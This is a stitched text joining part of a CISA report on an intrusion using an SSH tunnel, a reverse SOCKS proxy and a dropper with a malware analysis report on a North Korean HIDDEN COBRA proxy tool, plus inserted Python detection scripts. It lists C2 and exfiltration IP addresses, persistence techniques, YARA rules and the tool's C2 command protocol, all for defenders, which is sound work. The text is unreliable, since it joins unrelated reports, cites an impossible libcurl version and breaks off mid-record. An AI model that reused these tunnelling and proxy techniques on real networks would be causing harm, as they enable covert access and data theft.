The cyber threat actor established Persistence [TA0003] and Command and Control [TA0011] on the victim network by (1) creating a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, (2) running inetinfo.exe (a unique, multi-stage malware used to drop files), and (3) setting up a locally mounted remote share on IP address 78.27.70[.]237 (Proxy [T1090]). The mounted file share allowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis. Refer to Threat Actor Malware section for more information about the SSH Tunnel/reverse SOCKS proxy and inetinfo.exe.

The cyber threat actor created a local account, which they used for data Collection [TA0009], Exfiltration [TA0010], Persistence [TA0003], and Command and Control [TA0011] (Create Account [T1136]). The cyber threat actor used the local account to:

  • Browse directories on a victim file server (Data from Shared Network Drive [T1039]).
  • Copy a file from a user’s home directory to their locally mounted remote share (Data Staged [T1074]).
    • CISA analysts detected the cyber threat actor interacting with other files on users’ home directories but could not confirm whether they were exfiltrated.
  • Create a reverse SMB SOCKS proxy that allowed connection between a cyber threat actor-controlled VPS and the victim organization’s file server (refer to Threat Actor Malware section for more information) (Proxy [T1090]).
  • Interact with PowerShell module Invoke-TmpDavFS.psm (refer to Threat Actor Malware section for more information).
  • Exfiltrate data from an account directory and file server directory using tsclient (tsclient is a Microsoft Windows Terminal Services client) (Data from Local System [T1005], Data from Network Shared Drive [T1039]).
  • Create two compressed Zip files with several files and directories on them (Archive Collected Data [T1560]); it is likely that the cyber threat actor exfiltrated these Zip files, but this cannot be confirmed because the actor masked their activity.

See figure 1 for the sequence of the cyber threat actor’s tactics and techniques.

Figure 1: Cyber threat actor tactics and techniques

Threat Actor Malware

Persistent SSH Tunnel/Reverse SOCKS Proxy

While logged in as “Administrator,” the cyber threat actor created two Scheduled Tasks (see table 1) that worked in concert to establish a persistent SSH tunnel and reverse SOCKS proxy. The proxy allowed connections between an attacker-controlled remote server and one of the victim organization’s file servers (Scheduled Task/Job [T1053], Proxy [T1090]). The Reverse SOCKS Proxy communicated through port 8100 (Non-Standard Port [T1571]). This port is normally closed, but the attacker’s malware opened it.

Table 1: Scheduled Tasks composing SSH tunnel and reverse SOCKS proxy

Scheduled Task: ShellExperienceHost.exe

Description: This task created a persistent SSH tunnel to attacker-controlled remote server 206.189.18[.]189 and employed port forwarding to allow connections from the remote server port 39999 to the victim file server through port 8100. This task was run daily.

ShellExperienceHost.exe is a version of plink.exe, a command-line version of PuTTY that is used for remote administration.

Scheduled Task: WinDiag.exe

Description: This task is a reverse SOCKS proxy that is preconfigured to bind to and listen on TCP port 8100. WinDiag.exe received responses through the SSH tunnel and forwarded the responses through port 8100 to the VPS IP address 185.193.127[.]17 over port 443. This task was run on boot.

WinDiag.exe had compile information that matched the VPS login name.

Dropper Malware: inetinfo.exe

The threat actor created a Scheduled Task to run inetinfo.exe (Scheduled Task/Job [T1053]). inetinfo.exe is a unique, multi-stage malware used to drop files (figure 2). It dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.

Figure 2: Dropper malware inetinfo.exe

The cyber threat actor was able to overcome the agency’s anti-malware protection, and inetinfo.exe escaped quarantine. CISA analysts determined that the cyber threat actor accessed the anti-malware product’s software license key and installation guide and then visited a directory used by the product for temporary file analysis. After accessing this directory, the cyber threat actor was able to run inetinfo.exe (Impair Defenses: Disable or Modify Tools [T1562.001]).

Reverse SMB SOCKS Proxy

PowerShell script HardwareEnumeration.ps1 created a reverse SMB SOCKS proxy that allowed connection between attacker-controlled VPS IP 185.193.127[.]18 and the victim organization’s file server over port 443 (Command and Scripting Interpreter: PowerShell [T1059.001], Proxy [T1090]). PowerShell script HardwareEnumeration.ps1 was executed daily via a Scheduled Task (Scheduled Task/Job [T1053]).

HardwareEnumeration.ps1 is a copy of Invoke-SocksProxy.ps1, a free tool created and distributed by a security researcher on GitHub.[3] Invoke-SocksProxy.ps1 creates a reverse proxy from the local machine to attacker infrastructure through SMB TCP port 445 (Non-Standard Port [T1571]). The script was likely altered to fit the cyber threat actor’s configuration needs.

PowerShell Module: invoke-TmpDavFS.psm

invoke-TmpDavFS.psm is a PowerShell module that creates a Web Distributed Authoring and Versioning (WebDAV) server that can be mounted as a file system and communicates over TCP port 443 and TCP port 80. invoke-TmpDavFS.psm is distributed on GitHub.[4]

Solution

Indicators of Compromise

CISA analysts identified several IP addresses involved in the multiple stages of the outlined attack.

  • 185.86.151[.]223 – Command and Control (C2)
  • 91.219.236[.]166 – C2
  • 207.220.1[.]3 – C2
  • 78.27.70[.]237 – Data Exfiltration
  • 185.193.127[.]18 – Persistence

Monitor Network Traffic for Unusual Activity

CISA recommends organizations monitor network traffic for the following unusual activity.

  • Unusual open ports (e.g., port 8100)
  • Large outbound files
  • Unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP)

If network defenders note any of the above activity, they should investigate.
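
The three checks above (an unusual port such as 8100, large outbound transfers, and unapproved protocols leaving the network) can be expressed directly over connection logs. The following is an added example, not a CISA tool or script from the report: it triages a small set of constructed, Zeek-style tab-separated connection records (timestamp, source IP, source port, destination IP, destination port, protocol, bytes sent by the originator). The internal address ranges, the 50 MiB threshold and the sample records, which use RFC 5737 documentation addresses rather than the report's IOCs, are assumptions for the example.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass

WATCHED_PORTS = {8100}                                  # port named in the report
RISKY_OUTBOUND = {22: "SSH", 445: "SMB", 3389: "RDP"}   # protocols named above
LARGE_OUTBOUND_BYTES = 50 * 1024 * 1024                 # assumed threshold; tune per site
# Assumed organisation address space; real deployments load this from inventory.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass
class Conn:
    ts: float
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    orig_bytes: int  # bytes sent by the originator of the connection


def parse_conn(line):
    """Parse one constructed, Zeek-style tab-separated connection record."""
    ts, src_ip, src_port, dst_ip, dst_port, proto, orig_bytes = line.rstrip("\n").split("\t")
    return Conn(float(ts), src_ip, int(src_port), dst_ip, int(dst_port), proto, int(orig_bytes))


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def triage(lines):
    """Return the three categories of unusual activity found in the records."""
    report = {"outbound_protocol": set(), "watched_port": set(), "large_outbound": set()}
    outbound_bytes = defaultdict(int)  # (internal src, external dst) -> total bytes out
    for line in lines:
        c = parse_conn(line)
        src_in, dst_in = is_internal(c.src_ip), is_internal(c.dst_ip)
        if src_in and not dst_in:
            # Sum across connections: exfiltration is rarely a single flow.
            outbound_bytes[(c.src_ip, c.dst_ip)] += c.orig_bytes
            if c.dst_port in RISKY_OUTBOUND:
                report["outbound_protocol"].add((c.src_ip, c.dst_ip, RISKY_OUTBOUND[c.dst_port]))
        # An internal host using a watched port on either side of the connection.
        if (dst_in and c.dst_port in WATCHED_PORTS) or (src_in and c.src_port in WATCHED_PORTS):
            report["watched_port"].add((c.src_ip, c.dst_ip, c.dst_port))
    for (src, dst), total in outbound_bytes.items():
        if total >= LARGE_OUTBOUND_BYTES:
            report["large_outbound"].add((src, dst, total))
    return report


# Constructed sample records (not from the report).
SAMPLE_CONN_LOG = [
    "1600000000.1\t10.0.0.25\t51000\t203.0.113.9\t22\ttcp\t2048",        # outbound SSH to the internet
    "1600000001.2\t10.0.0.25\t51001\t203.0.113.9\t22\ttcp\t60000000",    # same pair, large transfer
    "1600000002.0\t10.0.0.7\t51002\t10.0.0.40\t445\ttcp\t4096",          # internal SMB: expected
    "1600000003.0\t10.0.0.7\t51003\t198.51.100.4\t443\ttcp\t800",        # HTTPS: not flagged
    "1600000004.0\t203.0.113.9\t39999\t10.0.0.40\t8100\ttcp\t512",       # watched port on an internal host
]

if __name__ == "__main__":
    for category, hits in triage(SAMPLE_CONN_LOG).items():
        print(category, sorted(hits))
```

One caveat worth keeping in mind when applying the port check: in the intrusion described above, port 8100 was reached through the SSH tunnel, so the wire only shows the outbound SSH session, and the 8100 leg appears in host-side telemetry (a listening-port inventory or Sysmon network events) rather than in perimeter flow logs. The outbound-protocol check is therefore the one a network sensor would actually fire on.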

Prevention

CISA recommends organizations implement the following recommendations to protect against activity identified in this report.

Deploy an Enterprise Firewall

Organizations should deploy an enterprise firewall to control what is allowed in and out of their network.

If the organization chooses not to deploy an enterprise firewall, they should work with their internet service provider to ensure the firewall is configured properly.

Block Unused Ports

Organizations should conduct a survey of the traffic in and out of their enterprise to determine the ports needed for organizational functions. They should then configure their firewall to block unnecessary ports. Organizations should develop a change control process to make control changes to those rules. Of special note, unused SMB, SSH, and FTP ports should be blocked.

Additional Recommendations

CISA recommends organizations implement the following best practices.

  • Implement multi-factor authentication, especially for privileged accounts.
  • Use separate administrative accounts on separate administration workstations.
  • Implement the principle of least privilege on data access.
  • Secure RDP and other remote access solutions using multifactor authentication and “jump boxes” for access.
  • Deploy and maintain endpoint defense tools on all endpoints.
  • Keep software up to date.

References

Revisions

  • September 24, 2020: Initial Version


Original release date: August 26, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, DHS, FBI, and DoD identified Remote Access Tool (RAT) malware variants used by the North Korean government. This malware variant has been identified as VIVACIOUSGIFT. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. DHS, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This report looks at the malware samples known as VIVACIOUSGIFT, which are used by advanced persistent threat (APT) cyber actors as a network proxy tool. The proxy requires an encrypted command line argument for its source and destination Internet Protocol (IP) addresses and has command and control (C2) functionality to retrieve and set the destination IP. The command line argument can also contain a source proxy IP, port, and password. The source proxy is used as an additional proxy when communicating with the source IP. The library libcurl version 7.94.1 is used when communicating with the source proxy.

For a downloadable copy of IOCs, see [STIX file].

Submitted Files (6)

70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38 (70b494b0a8fdf054926829dcb3235f…)

8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1 (8cad61422d032119219f465331308c…)

9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852 (9a776b895e93926e2a758c09e341ac…)

a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118 (a917c1cc198cf36c0f2f6c24652e5c…)

aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83 (aca598e2c619424077ef8043cb4284…)

f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de (f3ca8f15ca582dd486bd78fd57c2f4…)

Findings

a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118

Tags

HIDDEN-COBRA proxy trojan

Details
Name a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118
Size 408576 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 40e698f961eb796728a57ddf81f52b9a
SHA1 50b4f9a8fa6803f0aabb6fd9374244af40c2ba4c
SHA256 a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118
SHA512 2ee35d902f2a4022488bdc75cf7531f75de7e8bb4ca8645a9448f33051e835f0cea62e0157ac292187cd9406901f80570b8e17be52fee4a23f3c1aaa1a171cda
ssdeep 12288:E30MB7N+man4IrT0qhPyRg8o//ND6lAMYqcl:i0YNwrT0qhPFtHN2lLYq
Entropy 6.651902
Antivirus
Ahnlab Trojan/Win32.Banker
Antiy Trojan[Banker]/Win32.Agent
Avira TR/SpyBanker.Agent.AM
BitDefender Trojan.GenericKD.4446633
ClamAV Win.Trojan.Agent-6971031-0
Comodo TrojWare.Win32.Ransom.Teerac.C
Cyren W32/Banker.FTBC-3937
ESET Win32/Spy.Banker.ADRO trojan
Emsisoft Trojan.GenericKD.4446633 (B)
Ikarus Trojan-Spy.Banker
K7 Riskware ( 0040eff71 )
Lavasoft Trojan.GenericKD.4446633
McAfee Generic.abb
Microsoft Security Essentials TrojanSpy:Win32/Banker
NANOAV Trojan.Win32.Agent.enikaf
Quick Heal TrojanSpy.Banker
Sophos Mal/Generic-L
Symantec Trojan Horse
TrendMicro BKDR_KL.89AB2FB2
TrendMicro House Call BKDR_KL.89AB2FB2
Vir.IT eXplorer Trojan.Win32.Banker.FUW
VirusBlokAda TrojanBanker.Agent
Zillya! Trojan.Agent.Win32.763316
YARA Rules
rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
{
    meta:
        Author = "CISA Trusted Third Party"
        Incident = "10301706.r2.v1"
        Date = "2020-08-11"
        Actor = "Hidden Cobra"
        Category = "Backdoor Dropper Proxy Spyware Trojan"
        Family = "TWOPENCE"
        Description = "Detects strings in TWOPENCE proxy tool"
        MD5_1 = "40e698f961eb796728a57ddf81f52b9a"
        SHA256_1 = "a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118"
        MD5_2 = "dfd09e91b7f86a984f8687ed6033af9d"
        SHA256_2 = "aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83"
        MD5_3 = "bda82f0d9e2cb7996d2eefdd1e5b41c4"
        SHA256_3 = "f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de"
        MD5_4 = "97aaf130cfa251e5207ea74b2558293d"
        SHA256_4 = "9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852"
        MD5_5 = "889e320cf66520485e1a0475107d7419"
        SHA256_5 = "8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1"
    strings:
        $cmd1 = "ssylka"
        $cmd2 = "ustanavlivat"
        $cmd3 = "poluchit"
        $cmd4 = "pereslat"
        $cmd5 = "derzhat"
        $cmd6 = "vykhodit"
        $cmd7 = "Nachalo"
        $cmd8 = "kliyent2podklyuchit"
        $frmt1 = "Host: %s%s%s:%hu"
        $frmt2 = "%s%s%s%s%s%s%s%s%s%s"
    condition:
        (4 of ($cmd*)) and (1 of ($frmt*))
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-07-08 19:11:36-04:00
Import Hash 3415ed7e09a44243bcabe4422aeef7dc
PE Sections
MD5 Name Raw Size Entropy
0e135280ecde05507a86c5681ee38986 header 1024 2.480337
dfcc176fede07939cc4deb950858b6ce .text 333824 6.579572
d72f6b9398a7f267dfe5f1bd44778d62 .rdata 51712 6.391152
1e41f003bafe97cb5bfb59b3ad7d7531 .data 6656 3.459925
a8d51b81460671e8fb3df438f0f7fc28 .reloc 15360 5.531184
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file is a 32-bit Windows executable. The proxy requires a single command line argument. The argument can consist of a maximum of four encrypted strings delimited with the pipe character (“|”). When the four strings are parsed and decrypted, they represent the following: source IP and port, destination IP and port, source proxy IP and port, and source proxy password. The IP and port strings have the following format: <IP:port>. If the destination IP is missing from the command line argument, the proxy will wait to get the destination IP from the actor. The source proxy IP and port, as well as the source proxy password, are used as an additional proxy when communicating with the source IP. When communicating with the source proxy, the proxy will use libcurl with the options CURLOPT_HTTPPROXYTUNNEL and CURLOPT_NOBODY.

The following is an example of an encrypted command line argument that is missing the destination IP:

–Begin encrypted command line argument–
<encrypted_string>| |<encrypted_string>|<encrypted_string>
–End encrypted command line argument–

–Begin decrypted command line argument–
<IP>:<port>| |<IP>:<port>|<password>
–End decrypted command line argument–

The encrypted strings inside the command line argument can be individually decrypted with the Python script provided in Figure 1.

Below is the flow of events that happens when the proxy starts and is issued the commands “ustanavlivat” and “pereslat”. In the following example, the command line argument does not contain a source proxy. The command line argument can contain a source proxy IP, port, and password. If they exist, the proxy will route all traffic to the source IP through the source proxy. When communicating with the source proxy, the proxy uses the library libcurl with options CURLOPT_HTTPPROXYTUNNEL and CURLOPT_NOBODY. The data that is sent and received is encrypted using a custom encryption routine.

First, it connects to the source IP and sends the initialization message “Nachalo”. It sends a custom hash of “Dazdrav$958478Zohsf9q@%5555ahshdnZXniohs”. In return it receives two bytes of data. It sends the length (4 bytes) of the string “kliyent2podklyuchit” and then sends the string “kliyent2podklyuchit”. It sends the length (4 bytes) of the string “Nachalo” and then sends the string “Nachalo”.

Next, it receives C2 command “ustanavlivat” to set the destination IP address. It receives and decrypts the length of the string “ustanavlivat” and then receives and decrypts the string “ustanavlivat”.

Then, it receives C2 command “pereslat” to start the proxy functionality. It receives and decrypts the length of the string “pereslat” and then receives and decrypts the string “pereslat”.

Next, it connects to source IP and sends start proxy functionality message “ssylka”. It sends a custom hash of “Dazdrav$958478Zohsf9q@%5555ahshdnZXniohs”. In response it receives data. Then it sends the length (4 bytes) of string “kliyent2podklyuchit” and then sends the string “kliyent2podklyuchit”. Then it sends the length (4 bytes) of string “ssylka” and then sends the string “ssylka”.

Finally, it connects to destination IP and starts proxy functionality between source and destination IP.

The proxy uses a custom encryption routine to encode the data sent. The Python script provided in Figure 2 can decode the data.
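
The two structures the description above gives in full are the pipe-delimited argument layout (source, destination, source proxy, source proxy password, with a blank destination meaning "wait for the actor") and the framing of the exchange (a 4-byte length followed by the string). The script below is an added example for triaging decrypted samples and captures; it is not the report's Figure 1 or Figure 2 script and it does not implement the custom encryption, hash or decoding routines, which are not reproduced on this page. It assumes the argument and stream have already been decrypted with those routines, that the length prefix is a little-endian unsigned 32-bit integer (the report states the size but not the byte order), and it uses constructed sample values with RFC 5737 addresses.

```python
import ipaddress
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Command vocabulary from the CISA_3P_10301706_02 YARA rule, with the meanings
# the report gives; three strings appear in the rule but are not described.
COMMANDS = {
    "Nachalo": "initialization message",
    "kliyent2podklyuchit": "client connect marker",
    "ustanavlivat": "set destination IP",
    "pereslat": "start proxy functionality",
    "ssylka": "start-proxy message to source",
    "poluchit": "in YARA rule; not described in report",
    "derzhat": "in YARA rule; not described in report",
    "vykhodit": "in YARA rule; not described in report",
}


@dataclass
class Endpoint:
    ip: str
    port: int


@dataclass
class ProxyConfig:
    source: Endpoint
    destination: Optional[Endpoint]
    source_proxy: Optional[Endpoint]
    source_proxy_password: Optional[str]

    @property
    def awaits_destination(self) -> bool:
        """Per the report, a missing destination means the actor supplies it via 'ustanavlivat'."""
        return self.destination is None

    @property
    def uses_source_proxy(self) -> bool:
        """A source proxy means traffic to the source IP goes through an HTTP CONNECT tunnel (libcurl)."""
        return self.source_proxy is not None


def parse_endpoint(field: str) -> Optional[Endpoint]:
    """Parse '<IP:port>'; a blank field (the report's ' ' placeholder) yields None."""
    field = field.strip()
    if not field:
        return None
    host, sep, port = field.rpartition(":")
    if not sep:
        raise ValueError(f"expected <IP:port>, got {field!r}")
    port_num = int(port)
    if not 0 < port_num < 65536:
        raise ValueError(f"port out of range: {port_num}")
    return Endpoint(str(ipaddress.ip_address(host)), port_num)  # validates the IP


def parse_argument(decrypted: str) -> ProxyConfig:
    """Parse the decrypted, pipe-delimited argument (at most four fields)."""
    fields = decrypted.split("|")
    if len(fields) > 4:
        raise ValueError("at most four pipe-delimited fields are allowed")
    fields += [""] * (4 - len(fields))
    source = parse_endpoint(fields[0])
    if source is None:
        raise ValueError("source IP:port is required")
    return ProxyConfig(source, parse_endpoint(fields[1]), parse_endpoint(fields[2]),
                       fields[3].strip() or None)


def read_frames(stream: bytes) -> List[str]:
    """Split a decrypted stream of (u32 little-endian length, string) records."""
    frames, offset = [], 0
    while offset < len(stream):
        if len(stream) - offset < 4:
            raise ValueError("truncated length prefix")
        (length,) = struct.unpack_from("<I", stream, offset)
        offset += 4
        if length > len(stream) - offset:
            raise ValueError("frame length exceeds remaining data")
        frames.append(stream[offset:offset + length].decode("ascii"))
        offset += length
    return frames


def label_frames(frames: List[str]) -> List[Tuple[str, str]]:
    """Attach the report's meaning to each framed string for the analyst."""
    return [(f, COMMANDS.get(f, "unknown string")) for f in frames]


def _frame(s: str) -> bytes:
    """Builds the constructed sample stream below; same framing as read_frames."""
    return struct.pack("<I", len(s)) + s.encode("ascii")


# Constructed samples (documentation addresses, made-up password).
SAMPLE_ARG = "192.0.2.10:8080| |198.51.100.5:3128|hunter2"
SAMPLE_STREAM = b"".join(_frame(s) for s in
                         ["kliyent2podklyuchit", "Nachalo", "ustanavlivat", "pereslat", "ssylka"])

if __name__ == "__main__":
    print(parse_argument(SAMPLE_ARG))
    for text, meaning in label_frames(read_frames(SAMPLE_STREAM)):
        print(f"{text:22} {meaning}")
```

The `awaits_destination` flag is what distinguishes a sample that is preconfigured with its target from one that will sit idle until the actor sends “ustanavlivat”, which matters when deciding whether a captured sample's configuration alone identifies the victim-side endpoint.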

Screenshots

Figure 1 - The Python script to individually decrypt the encrypted strings inside the command line argument.

Figure 2 - The Python script to decode the encoded data sent by the proxy custom encryption routine.

aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83

Tags

HIDDEN-COBRA, dropper, proxy, spyware, trojan

Details
Name aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83
Size 232960 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 dfd09e91b7f86a984f8687ed6033af9d
SHA1 b8fe7884d2dc4983fb0fbca192694ce2f4685e23
SHA256 aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83
SHA512 641dd95c101ae7566defb1a24279badb8c7aa94331442e0f470866b6a1e44c8790a71e83cc1cb188d7530c08bf0e5d227d35caa9a2cf7e54d2f7319381af2d84
ssdeep 3072:XU5r72JE+FYWR0jZLShk4cPT/QzSaQ0sCFneZTznIhZJJcrJ1GHeV9:XU5uJpYnZL05STQNddFnAnGZIrV
Entropy 6.524225
Antivirus
Ahnlab Trojan/Win32.Alreay
Antiy Trojan[Banker]/Win32.Alreay
ClamAV Win.Trojan.Agent-6971031-0
Comodo TrojWare.Win32.TrojanDropper.Agent.PRQ
Cyren W32/Alreay.SQQX-6406
ESET a variant of Win32/Spy.Banker.ADRO trojan
K7 Spyware ( 005198041 )
McAfee GenericRXFQ-MX!DFD09E91B7F8
Microsoft Security Essentials TrojanSpy:Win32/Banker!dha
Symantec Trojan Horse
TrendMicro TSPY_BA.C25E7684
TrendMicro House Call TSPY_BA.C25E7684
Zillya! Trojan.Alreay.Win32.42
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
    {
       meta:
           Author = "CISA Trusted Third Party"
           Incident = "10301706.r2.v1"
           Date = "2020-08-11"
           Actor = "Hidden Cobra"
           Category = "Backdoor Dropper Proxy Spyware Trojan"
           Family = "TWOPENCE"
           Description = "Detects strings in TWOPENCE proxy tool"
           MD5_1 = "40e698f961eb796728a57ddf81f52b9a"
           SHA256_1 = "a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118"
           MD5_2 = "dfd09e91b7f86a984f8687ed6033af9d"
           SHA256_2 = "aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83"
           MD5_3 = "bda82f0d9e2cb7996d2eefdd1e5b41c4"
           SHA256_3 = "f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de"
           MD5_4 = "97aaf130cfa251e5207ea74b2558293d"
           SHA256_4 = "9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852"
           MD5_5 = "889e320cf66520485e1a0475107d7419"
           SHA256_5 = "8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1"
       strings:
           $cmd1 = "ssylka"
           $cmd2 = "ustanavlivat"
           $cmd3 = "poluchit"
           $cmd4 = "pereslat"
           $cmd5 = "derzhat"
           $cmd6 = "vykhodit"
           $cmd7 = "Nachalo"
           $cmd8 = "kliyent2podklyuchit"
           $frmt1 = "Host: %s%s%s:%hu"
           $frmt2 = "%s%s%s%s%s%s%s%s%s%s"
       condition:
           (4 of ($cmd*)) and (1 of ($frmt*))
    }
ssdeep Matches
99 9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852
PE Metadata
Compile Date 2016-09-18 23:24:39-04:00
Import Hash 6b8fa355d78d649f199232a25e22d630
PE Sections
MD5 Name Raw Size Entropy
41a5273e6d92dfe9de72f76c18f6475f header 1024 2.398805
e6412e7fb561ead2b3eddef9bafd3518 .text 198656 6.554337
a9890fd54b24cf53425649a92fe290ad .rdata 18432 5.115959
884e0d48d1830995eeade874d295ced0 .data 5632 3.201975
0e79f25ba5ec9ae1502fe80ec7b08f79 .reloc 9216 5.674607
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de

Tags

HIDDEN-COBRA, proxy, trojan

Details
Name f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de
Size 265216 bytes
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 bda82f0d9e2cb7996d2eefdd1e5b41c4
SHA1 9ff715209d99d2e74e64f9db894c114a8d13229a
SHA256 f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de
SHA512 6774cc49f5200d1a427b5a2af77d27eaac671f405e01f3ded2d152e5e08d1217d2b3b9d8508d2924aee5f0925abc32f83645756cf248222193eb13194eb39add
ssdeep 6144:+TW3SZ4GvcPPWi9JhJTxPm26ebMk5Q35m8LERov:invQThJsexib
Entropy 6.304640
Antivirus
Ahnlab Trojan/Win32.Alreay
Antiy Trojan[Banker]/Win32.Alreay
Avira TR/AD.APTLazerus.dsenf
BitDefender Gen:Variant.Razy.368693
ClamAV Win.Trojan.Agent-6971031-0
Comodo Malware
Cyren W64/Alreay.C
ESET a variant of Win64/NukeSped.BB trojan
Emsisoft Gen:Variant.Razy.368693 (B)
Ikarus Trojan.Win64.Nukesped
K7 Trojan ( 00538e2b1 )
Lavasoft Gen:Variant.Razy.368693
McAfee PWS-Banker.gen.gj
Symantec Trojan.Gen.6
Systweak trojan.banker
TrendMicro BKDR64_.8979788A
TrendMicro House Call BKDR64_.8979788A
VirusBlokAda TrojanBanker.Alreay
Zillya! Trojan.GenericKD.Win32.133035
YARA Rules
  • rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan (the same rule as listed under aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83 above)
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-05-01 23:24:39-04:00
Import Hash b2b084698f33fd93bc9e72f0c2af26b5
PE Sections
MD5 Name Raw Size Entropy
379ffb6e4aeb96c753dbe1f16dae01db header 1024 2.516799
33c1647f8f3a870e4c8f9b48b5ec2c82 .text 212480 6.373885
5bb6bf3a50e4982066d5746d99945853 .rdata 31232 5.302106
a62c434f5beb6282b437c5e0dc40c616 .data 7168 2.877953
6ba7963edd09a132976d6830462fc17f .pdata 11776 5.348074
06ce263d0dc81197b88ff3f576787648 .reloc 1536 2.915027
Packers/Compilers/Cryptors
Microsoft Visual C++ 8.0 (DLL)
Description

This file is a 64-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852

Tags

HIDDEN-COBRA, proxy, spyware, trojan

Details
Name 9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852
Size 232960 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 97aaf130cfa251e5207ea74b2558293d
SHA1 c7e7dd96fefca77bb1097aeeefef126d597126bd
SHA256 9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852
SHA512 d8b750263ac8b295a934ef60a694108257c489055c6aee24bae000d70d0bdde70934e8c2a157d38c15469bc5fb2a6cfcb733ddd4729ba05200dfa243913cf73d
ssdeep 3072:6U5r72JE+FYWR0jZLShk4cPT/QzSaQ0sCFneZTznIhZJJcrJ1GHeV9:6U5uJpYnZL05STQNddFnAnGZIrV
Entropy 6.524151
Antivirus
Ahnlab Trojan/Win32.Alreay
Antiy Trojan[Banker]/Win32.Alreay
BitDefender Trojan.Generic.22528938
ClamAV Win.Trojan.Agent-6971031-0
Comodo Malware
Cyren W32/Alreay.SQQX-6406
ESET a variant of Win32/Spy.Banker.ADRO trojan
Emsisoft Trojan.Generic.22528938 (B)
Ikarus Trojan-Spy.Agent
K7 Spyware ( 005198041 )
Lavasoft Trojan.Generic.22528938
